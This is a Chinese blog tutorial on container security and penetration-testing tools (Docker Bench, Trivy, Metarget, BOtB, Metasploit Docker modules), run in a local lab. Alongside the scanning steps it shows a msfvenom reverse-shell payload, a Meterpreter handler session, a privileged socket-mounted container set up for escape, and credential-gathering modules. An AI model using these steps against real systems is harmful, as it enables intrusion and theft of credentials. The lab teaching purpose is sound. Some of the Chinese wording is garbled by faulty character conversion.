容器安全检测和渗透测试工具

《Java代码审计》

http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484219&idx=1&sn=73564e316a4c9794019f15dd6b3ba9f6&chksm=c0e47a67f793f371e9f6a4fbc06e7929cb1480b7320fae34c32563307df3a28aca49d1a4addd&scene=21#wechat_redirect

Docker-bench-security


Docker Bench for Security 是一个脚本，用于主动化检查在生产中摆设 Docker 容器的数十种常见最佳实践，比如主机配置的安全性、Docker deamon配置的安全性、容器镜像和构建的安全性等。
项目所在
https://github.com/docker/docker-bench-security
使用测试
在主机上下载并实行主动化脚本

1. git clone https://github.com/docker/docker-bench-security.git
2. cd docker-bench-security
3. sudo sh docker-bench-security.sh

复制代码

脚本主动化检测当前主机的容器安全性，并将检测到的信息输出到终端，对于检测到的不安全的内容，会以[warn]提示，并在最后给出测评的分数.

2. trivy

简介
trivy是一个由asuz公司开源的简朴而全面的扫描器，用于检测容器镜像、文件系统和 Git 存储库中的毛病以及配置问题。 Trivy 检测操作系统包（Alpine、RHEL、CentOS 等）和特定语言包（Bundler、Composer、npm、yarn 等）的毛病。别的，Trivy 会扫描根本办法即代码 (IaC) 文件，比方 Terraform、Dockerfile 和 Kubernetes，以检测使您的摆设面临攻击风险的潜伏配置问题。
项目所在
https://github.com/aquasecurity/trivy
使用测试

1. wget https://github.com/aquasecurity/trivy/releases/download/v0.21.2/trivy_0.21.2_Linux-64bit.tar.gz
2. tar -zxvf trivy_0.21.2_Linux-64bit.tar.gz
3. ./trivy image alpine:3.10.7

复制代码

3. Metarget

简介
Metarget的名称来源于meta-（元）加target（目标，靶机），是一个脆弱根本办法主动化构建框架，主要用于快速、主动化搭建从简朴到复杂的脆弱云原生靶机情况。「绿盟科技研究通讯」上发布了一篇叙述Metarget的设计理念和技能目标的文章，见Metarget：云原生攻防靶场开源啦！。
项目所在
https://github.com/Metarget/metarget
使用测试

• 安装
  

1. git clone https://github.com/brant-ruan/metarget.git
2. cd metarget/
3. pip install -r requirements.txt

复制代码

• 使用
  

1. ./metarget cnv install cve-2019-5736
2. ./metarget appv install dvwa --external

复制代码

4. BOtB

简介：
BOtB是由Chris Le Roy开源的容器安全分析和脆弱点利用工具，使用go语言开发，它可以或许辅助情况探测，还可以或许利用CVE-2019-5736、Docker Socket或特权模式进行容器逃逸。还有识别K8s的密钥并使用、将数据推送到 S3 存储桶等功能
项目所在：
https://github.com/brompwnie/botb
使用测试：

1. docker run -itd -v /var/run/docker.sock:/run/docker.sock --privileged --name test2 ubuntu /bin/bash
2. docker exec -it test2 /bin/bash
3. apt update && apt install -y curl
4. curl -fSL "https://github.com/brompwnie/botb/releases/download/1.7.0/botb-linux-amd64" -o "botb-linux-amd64" \
5. && chmod +x botb-linux-amd64

复制代码

在容器中实行命令，使用特权模式进行容器逃逸

利用挂载到容器内的Docker Socket进行容器逃逸得到宿主机shell：

5. Metaspliot

在metaspliot中搜刮关于docker的模块有以下几种，

1. msf6 > search docker
2. ​
3. Matching Modules
4. ================
5. ​
6.    #   Name                                                    Disclosure Date  Rank       Check  Description
7.    -   ----                                                    ---------------  ----       -----  -----------
8.    0   auxiliary/gather/saltstack_salt_root_key                2020-04-30       normal     No     SaltStack Salt Master Server Root Key Disclosure
9.    1   auxiliary/scanner/http/docker_version                                    normal     No     Docker Server Version Scanner
10.    2   exploit/linux/http/dcos_marathon                        2017-03-03       excellent  Yes    DC/OS Marathon UI Docker Exploit
11.    3   exploit/linux/http/docker_daemon_tcp                    2017-07-25       excellent  Yes    Docker Daemon - Unprotected TCP Socket Exploit
12.    4   exploit/linux/http/rancher_server                       2017-07-27       excellent  Yes    Rancher Server - Docker Exploit
13.    5   exploit/linux/local/docker_daemon_privilege_escalation  2016-06-28       excellent  Yes    Docker Daemon Privilege Escalation
14.    6   exploit/linux/local/docker_privileged_container_escape  2019-07-17       normal     Yes    Docker Privileged Container Escape
15.    7   exploit/linux/misc/saltstack_salt_unauth_rce            2020-04-30       great      Yes    SaltStack Salt Master/Minion Unauthenticated RCE
16.    8   exploit/windows/local/docker_credential_wincred         2019-07-05       manual     Yes    Docker-Credential-Wincred.exe Privilege Escalation
17.    9   post/linux/gather/checkcontainer                                         normal     No     Linux Gather Container Detection
18.    10  post/linux/gather/enum_containers                                        normal     No     Linux Container Enumeration
19.    11  post/multi/gather/docker_creds                                           normal     No     Multi Gather Docker Credentials Collection
20. ​
21. ​
22. Interact with a module by name or index. For example info 11, use 11 or use post/multi/gather/docker_creds   

复制代码

5.1 exploit/multi/handler

注意，post分类下的模块通常在后渗透阶段实行，因为这些模块的实行通常依赖于一个已有Meterpreter会话。为方便演示，我们接纳如下操作来构造一个如许的Meterpreter shell：
在本地测试情况中，首先天生一个反弹shell：

1. msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=172.17.0.1 lport=10000 -f elf -o reverse_shell

复制代码

然后创建容器把反弹shell放进去，

1. docker cp ./reverse_shell e51242b34b04:/

复制代码

接着在Metasploit中开启监听，再在容器中运行反弹shell。至此，我们在Metasploit中得到了一个Meterpreter：

1. msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
2. payload => linux/x64/meterpreter/reverse_tcp
3. ​
4. msf6 exploit(multi/handler) > set LHOST 192.168.21.130
5. LHOST => 192.168.21.130
6. ​
7. msf6 exploit(multi/handler) > set LPORT 10000
8. LPORT => 10000
9. msf6 exploit(multi/handler) > run
10. ​
11. [*] Started reverse TCP handler on 192.168.21.130:10000
12. [*] Sending stage (3008420 bytes) to 172.17.0.2
13. [*] Meterpreter session 1 opened (192.168.21.130:10000 -> 172.17.0.2:45290) at 2021-12-04 08:02:50 -0500
14. ​
15. meterpreter >

复制代码

这个shell是容器内部的，如果要在宿主机上创建shell，只需要在宿主机上实行反弹shell步伐即可。
5.2 docker_version

所在：https://github.com/rapid7/metas
功能：查看Docker服务器版本（设置VERBOSE参数为true可以或许得到更多信息）。
原理：向Docker Daemon监听的2375端口发起请求。
限制：目标情况的Docker Daemon必须开启端口监听且可以或许被长途访问。
实行：
在本地Docker测试情况中，先vi /usr/lib/systemd/system/docker.service修改 [Service]的ExecStart，增长 -H tcp://0.0.0.0:2375开启2375端口监听，然后在别的终端窗口中利用Metasploit进行扫描：

1. msf6 > use auxiliary/scanner/http/docker_version
2. msf6 auxiliary(scanner/http/docker_version) > show options
3. ​
4. Module options (auxiliary/scanner/http/docker_version):
5. ​
6.    Name     Current Setting  Required  Description
7.    ----     ---------------  --------  -----------
8.    Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
9.    RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
10.    RPORT    2375             yes       The target port (TCP)
11.    SSL      false            no        Negotiate SSL/TLS for outgoing connections
12.    THREADS  1                yes       The number of concurrent threads (max one per host)
13.    VHOST                     no        HTTP server virtual host
14. ​
15. msf6 auxiliary(scanner/http/docker_version) > set RHOSTS 127.0.0.1
16. RHOSTS => 127.0.0.1
17. msf6 auxiliary(scanner/http/docker_version) > set VERBOSE true
18. VERBOSE => true
19. msf6 auxiliary(scanner/http/docker_version) > exploit
20. ​
21. [*] Identifying Docker Server Version on 127.0.0.1:2375      
22. [+] [Docker Server] Version: 20.10.11
23. [*] All info: {"Platform"=>{"Name"=>"Docker Engine - Community"}, "Components"=>[{"Name"=>"Engine", "Version"=>"20.10.11", "Details"=>{"ApiVersion"=>"1.41", "Arch"=>"amd64", "BuildTime"=>"2021-11-18T00:35:31.000000000+00:00", "Experimental"=>"false", "GitCommit"=>"847da18", "GoVersion"=>"go1.16.9", "KernelVersion"=>"5.10.0-kali3-amd64", "MinAPIVersion"=>"1.12", "Os"=>"linux"}}, {"Name"=>"containerd", "Version"=>"1.4.12", "Details"=>{"GitCommit"=>"7b11cfaabd73bb80907dd23182b9347b4245eb5d"}}, {"Name"=>"runc", "Version"=>"1.0.2", "Details"=>{"GitCommit"=>"v1.0.2-0-g52b36a2"}}, {"Name"=>"docker-init", "Version"=>"0.19.0", "Details"=>{"GitCommit"=>"de40ad0"}}], "Version"=>"20.10.11", "ApiVersion"=>"1.41", "MinAPIVersion"=>"1.12", "GitCommit"=>"847da18", "GoVersion"=>"go1.16.9", "Os"=>"linux", "Arch"=>"amd64", "KernelVersion"=>"5.10.0-kali3-amd64", "BuildTime"=>"2021-11-18T00:35:31.000000000+00:00"}
24. [*] Saving host information.
25. [*] Scanned 1 of 1 hosts (100% complete)
26. [*] Auxiliary module execution completed

复制代码

5.3 exploit/linux/http/docker_daemon_tcp

所在：https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb
功能：利用监听了TCP socket的Docker保卫进程实现root权限长途代码实行。
原理：长途给Docker保卫进程下达命令拉取镜像，创建新容器，挂载宿主机目录，写入反弹shell的定时任务。
限制：目标情况的Docker Daemon必须开启端口监听且可以或许被长途访问。
实行：我们先开启Docker保卫进程的TCP socket监听，然后在Metasploit中载入模块，设置payload为反弹Meterpreter，接着设置相干参数，最后实行模块即可

5.4 post/linux/gather/checkcontainer

所在：https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/checkcontainer.rb
功能：检测目标情况是否为容器。
原理：较为简朴，即检测/.dockerenv特性文件和cgroup里的特性字符串是否存在等。
限制：得到一个根本shell之后才能使用（后渗透阶段）。
实行：在Meterpreter中，实行该模块即可：run post/linux/gather/checkcontainer
5.5 post/linux/gather/enum_protections

所在：https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_protections.rb
功能：检测目标情况中各种毛病缓解机制是否开启（对于容器情况来说，会影响逃逸成功率），具体检测了毛病缓解措施是否开启，如ASLR、kernel.exec-shield、KAISER、SMEP/SMAP；还检测了LKRG、Grsecurity、PaX、SELinux、Yama等内核安全模块是否安装及开启；别的，还检测了一些常见安全应用等（详见源代码）。
原理：该模块调用了Metasploit核心模块Msf:ost:inux::Kernel，核心模块则是通过读取内核通过procfs等伪文件系统在用户态袒露出的参数来判断相干缓解机制是否开启。比方，对ASLR的判断如下：

1. def aslr_enabled?
2.     aslr = cmd_exec('cat /proc/sys/kernel/randomize_va_space').to_s.strip
3.     (aslr.eql?('1') || aslr.eql?('2'))
4.   rescue
5.     raise 'Could not determine ASLR status'
6.   end

复制代码

限制：得到一个根本shell之后才能使用（后渗透阶段）。
实行：在Meterpreter中，实行该模块即可：

5.6 post/multi/gather/docker_creds

所在：https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/gather/docker_creds.rb
功能：实行读取全部用户目录下的.docker/config.json文件，解析得到认证根据（如镜像仓库的登录根据）。
原理：读取.docker/config.json文件。
限制：得到一个根本shell之后才能使用（后渗透阶段）。
实行：新安装的Docker情况下可能没有~/.docker/目录，可以先docker login登录一次镜像仓库，Docker就会为当前用户创建这个目录。接着，在宿主机上创建Meterpreter，然后实行模块即可,：

5.7 其他

• exploit/linux/http/rancher_server
  利用 Rancher Server，在长途主机上创建新容器，并挂载宿主机目录，并反弹shell。
  
• exploit/linux/http/dcos_marathon
  利用 DCOS Cluster's Marathon UI，在长途主机上创建新容器，并挂载宿主机目录，并反弹shell。
  
• exploit/linux/local/docker_daemon_privilege_escalation
  当拿到目标宿主机上的一个平常用户shell时，如果该平常用户可以或许操作本机上的Docker，就可以或许借助Docker保卫进程提拔权限。
  
• exploit/linux/local/docker_privileged_container_escape
  当docker以特权模式启动时，该模块可以通过利用特权模式使容器从宿主机中逃逸
  
• exploit/linux/local/docker_runc_escape
  该模块利用 runc 中的一个缺陷 （CVE-2019-5736），通过覆盖runc文件，帮助容器逃逸
  

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。